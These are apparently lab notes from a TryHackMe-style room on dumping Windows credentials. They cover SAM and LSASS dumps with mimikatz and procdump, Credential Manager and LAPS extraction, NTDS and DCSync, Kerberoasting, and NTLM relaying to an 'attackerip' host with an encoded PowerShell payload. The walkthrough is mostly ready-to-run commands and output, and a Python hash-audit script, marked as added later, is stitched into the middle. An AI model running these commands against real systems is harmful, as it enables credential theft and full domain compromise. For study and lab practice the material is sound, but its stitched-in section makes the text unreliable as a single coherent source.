4. Dumping Credentials
Dumping SAM
The SAM file typically cannot be accessed while Windows is running
c:\Windows\System32\config\sam
So we obtain it via one of:
meterpreter
mimikatz
Volume Shadow Copy Service / Registry Hives
Meterpreter Method
meterpreter > getuid
Server username: THM\Administrator
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3b784d80d18385cea5ab3aa2a4261:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:443e64439a4b7fe780db47fc06a3342d:::
Volume Shadow Copy Service / Registry Hives
C:\Users\Administrator>wmic shadowcopy call create Volume='C:\'
Executing (Win32_ShadowCopy)->create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ReturnValue = 0;
ShadowID = "{D8A11619-474F-40AE-A5A0-C2FAA1D78B85}";
};
Getting info from registry hives
C:\Users\Administrator\Desktop>reg save HKLM\sam C:\users\Administrator\Desktop\sam-reg
With either the Shadow Copy or the SAM saved from the registry hive, we need to decrypt it with the key found in c:\Windows\System32\Config\system.
C:\Users\Administrator\Desktop>reg save HKLM\system C:\users\Administrator\Desktop\system-reg
Once we have both pieces, we move them to the attacker machine to decrypt them
user@machine:~ python3.9 /opt/impacket/examples/secretsdump.py -sam /tmp/sam-reg -system /tmp/system-reg LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3a787a80d08385cea7fb4aa2a4261:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
Dumping LSASS
LSASS contains password hashes
Before dumping LSASS, we need to disable LSA Protection using mimikatz
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started
mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 528 -> 00/00 [0-0-0]
Creating a dump file via GUI

Dumping via SysinternalsSuite
c:\>c:\Tools\SysinternalsSuite\procdump.exe -accepteula -ma lsass.exe c:\Tools\Mimikatz\lsass_dump
ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[09:09:33] Dump 1 initiated: c:\Tools\Mimikatz\lsass_dump-1.dmp
[09:09:33] Dump 1 writing: Estimated dump file size is 162 MB.
[09:09:34] Dump 1 complete: 163 MB written in 0.4 seconds
[09:09:34] Dump count reached.
Dumping via mimikatz
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515377 (00000000:0007dd31)
Session : RemoteInteractive from 3
User Name : Administrator
Domain : THM
Logon Server : CREDS-HARVESTIN
Logon Time : 6/3/2022 8:30:44 AM
SID : S-1-5-21-1966530601-3185510712-10604624-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : THM
* NTLM : 98d3a787a80d08385cea7fb4aa2a4261
* SHA1 : 64a137cb8178b7700e6cffa387f4240043192e72
* DPAPI : bc355c6ce366fdd4fd91b54260f9cf70
...
Dumping from Windows Credential Manager
Use vaultcmd /list to find any stored credentials
C:\Users\Administrator>vaultcmd /list
Currently loaded vaults:
Vault: Web Credentials
Vault Guid:4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Vault: Windows Credentials
Vault Guid:77BC582B-F0A6-4E15-4E80-61736B6F3B29
Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault
Use /listproperties to check if there are any stored credentials in the vault
C:\Users\Administrator>VaultCmd /listproperties:"Web Credentials"
Vault Properties: Web Credentials
Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Number of credentials: 1
Current protection method: DPAPI
Extract the password using Get-WebCredentials.ps1
C:\Users\Administrator>powershell -ex bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator> Import-Module C:\Tools\Get-WebCredentials.ps1
PS C:\Users\Administrator> Get-WebCredentials
UserName Resource Password Properties
-------- -------- -------- ----------
THMUser internal-app.thm.red Password! {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], [application, MSEdge]}
Using cmdkey, we can see which credentials are already stored in the session
C:\Users\thm>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=thm\thm-local
Type: Domain Password
User: thm\thm-local
Knowing this, we can use runas /savecred to ride on this saved credential in the session for authentication on the domain THM.red
C:\Users\thm>runas /savecred /user:THM.red\thm-local cmd.exe
Attempting to start cmd.exe as user "THM.red\thm-local" ...
Dumping credentials on the Credential Manager using mimikatz
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::credman
Dumping from Domain Controller
NTDS
New Technologies Directory Services (NTDS) is a database containing all Active Directory data, including objects, attributes, credentials
NTDS is located in C:\Windows\NTDS
Decrypting the NTDS file requires a system boot key, which is stored in C:\Windows\System32\config\SECURITY
In essence, we need these 3 files
C:\Windows\NTDS\ntds.dit
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
Using ntdsutil.exe, this will dump out all 3 files we need into C:\temp
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
Move those files to the attacker machine and decrypt them with impacket to get the hashes
user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -security path/to/SECURITY -system path/to/SYSTEM -ntds path/to/ntds.dit local
DCSync
mimikatz # log dcdump.txt
mimikatz # lsadump::dcsync /domain:za.tryhackme.loc /all
Now we analyze the file with grep
cat dcdump.txt | grep "SAM Username"
cat dcdump.txt | grep "Hash NTLM"
cat dcdump.txt | grep "krbtgt" -A10 # get ntlm hash of krbtgt for golden ticket forging
cat dcdump.txt | grep "<machine name>" -A10 # get ntlm hash of machine account for silver ticket forging
impacket
user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -just-dc THM.red/<AD_Admin_User>@10.10.224.1
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
## only dumping ntlm hashes
user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -just-dc-ntlm THM.red/<AD_Admin_User>@10.10.224.1
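The secretsdump output above (both the local SAM dump and the DCSync dump) shares one line format, user:rid:lmhash:nthash:::. The following is an added audit helper, not part of the original notes or of impacket, that parses that format and flags the weaknesses a defender reviewing an authorised dump looks for: blank passwords, LM hash storage still enabled, and one NT hash shared by several accounts. The sample lines are constructed; the empty-password LM and NT hash constants are the standard well-known values.

```python
import re
from collections import defaultdict

# Well-known hashes of the empty password (LM and NT); standard constants.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One secretsdump/hashdump record: user:rid:lmhash:nthash:::
# The user may carry a domain prefix (thm.red\thm); hashes may be redacted.
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[^:]+):(?P<nt>[^:]+):::$")
HEX32 = re.compile(r"[0-9a-f]{32}")

# Constructed sample dump (not real credentials): status lines, a redacted
# entry, a blank Guest password, one LM hash and one reused NT hash.
SAMPLE_LINES = [
    "[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)",
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3a787a80d08385cea7fb4aa2a4261:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "svc-backup:1105:e52cac67419a9a224a3b108f3fa6cb6d:98d3a787a80d08385cea7fb4aa2a4261:::",
    r"thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::",
    "[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.",
]

def parse_dump(text):
    """Return (user, rid, lm, nt) tuples; skip status lines and redacted/malformed hashes."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # "[*]" / "[-]" status lines and blanks never match
        lm, nt = m["lm"].lower(), m["nt"].lower()
        if not (HEX32.fullmatch(lm) and HEX32.fullmatch(nt)):
            continue  # "[****REMOVED****]" or otherwise unusable hash
        entries.append((m["user"], int(m["rid"]), lm, nt))
    return entries

def audit(entries):
    """Flag blank passwords, stored LM hashes, and NT hashes shared across accounts."""
    findings, by_nt = [], defaultdict(list)
    for user, rid, lm, nt in entries:
        if nt == EMPTY_NT:
            findings.append((user, "blank password"))
        if lm != EMPTY_LM:
            findings.append((user, "LM hash stored"))
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(sorted(users)), "shared NT hash"))
    return findings

if __name__ == "__main__":
    for who, issue in audit(parse_dump("\n".join(SAMPLE_LINES))):
        print(f"{issue:16} {who}")
```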
Local Administrator Password Solution (LAPS)
We can check if LAPS is installed by looking for AdmPwd.dll
C:\Users\thm>dir "C:\Program Files\LAPS\CSE"
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Program Files\LAPS\CSE
06/06/2022 01:01 PM .
06/06/2022 01:01 PM ..
05/05/2021 07:04 AM 184,232 AdmPwd.dll
1 File(s) 184,232 bytes
2 Dir(s) 10,306,015,232 bytes free
Find Groups that can interact with the LAPS
PS C:\Users\thm> Find-AdmPwdExtendedRights -Identity THMorg
ObjectDN ExtendedRightHolders
-------- --------------------
OU=THMorg,DC=thm,DC=red {THM\THMGroupReader}
Finding users in the group
PS C:\Users\thm> net groups "THMGroupReader"
Group name THMGroupReader
Comment
Members
-------------------------------------------------------------------------------
bk-admin
The command completed successfully.
Once we compromise bk-admin, we can then use it to access LAPS
C:\Users\thm> runas /user:THM\bk-admin cmd.exe
PS C:\\> Get-AdmPwdPassword -ComputerName creds-harvestin
ComputerName DistinguishedName Password ExpirationTimestamp
------------ ----------------- -------- -------------------
CREDS-HARVESTIN CN=CREDS-HARVESTIN,OU=THMorg,DC=thm,DC=red FakePassword 2/11/2338 11:05:2...
Kerberoasting
A Kerberoasting attack involves requesting a Ticket Granting Ticket (TGT) and then a Ticket Granting Service (TGS) ticket.
Using the TGS, we can attempt to brute force the service account's password offline.
We need accounts that have an SPN (Service Principal Name), such as an IIS user, MSSQL, etc.
user@machine$ python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.224.1 THM.red/thm
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------- -------- -------------------------- --------- ----------
http/creds-harvestin.thm.red svc-user 2022-06-04 00:15:18.413578
Once we find the SPN user, we can send a single request to get a TGS ticket for the svc-user account using the -request-user argument.
user@machine$ python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.224.1 THM.red/thm -request-user svc-user
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------- -------- -------------------------- --------- ----------
http/creds-harvestin.thm.red svc-user 2022-06-04 00:15:18.413578
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc-user$THM.RED$THM.red/svc-user*$8f5de4211da1cd5715217[*REMOVED*]7bfa3680658dd9812ac061c5
After getting the TGS, we can attempt to crack it to get the password
user@machine$ hashcat -a 0 -m 13100 spn.hash /usr/share/wordlists/rockyou.txt
NTLM Relaying
Responder
On the attacker
$ sudo responder -I tun0
On the victim, run this. Responder should get the NTLM hash of the account which you can crack or pass
PS> dir //attackerip/lol
NTLMRelayx
On the attacker
$ impacket-ntlmrelayx --no-http-server -smb2support -t <relay_target> -c "powershell -enc JABjAGwAaQBlAG4AdA..."
On the victim, run this. NTLMRelayx captures the NTLMv2 authentication, which we can either crack or relay to authenticate to another server and execute code
PS> dir //attackerip/lol
Other methods
PowerShell history file
C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Passwords in Registry
c:\Users\user> reg query HKLM /f password /t REG_SZ /s
C:\Users\user> reg query HKCU /f password /t REG_SZ /s
Unattended Windows Installations
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Saved Credentials
You can’t see the passwords, but you can ride on them
cmdkey /list # seeing if there are saved creds in the session
runas /savecred /user:admin cmd.exe # if admin has a saved cred, we can run as him
IIS Configuration
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
Software: PuTTY
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s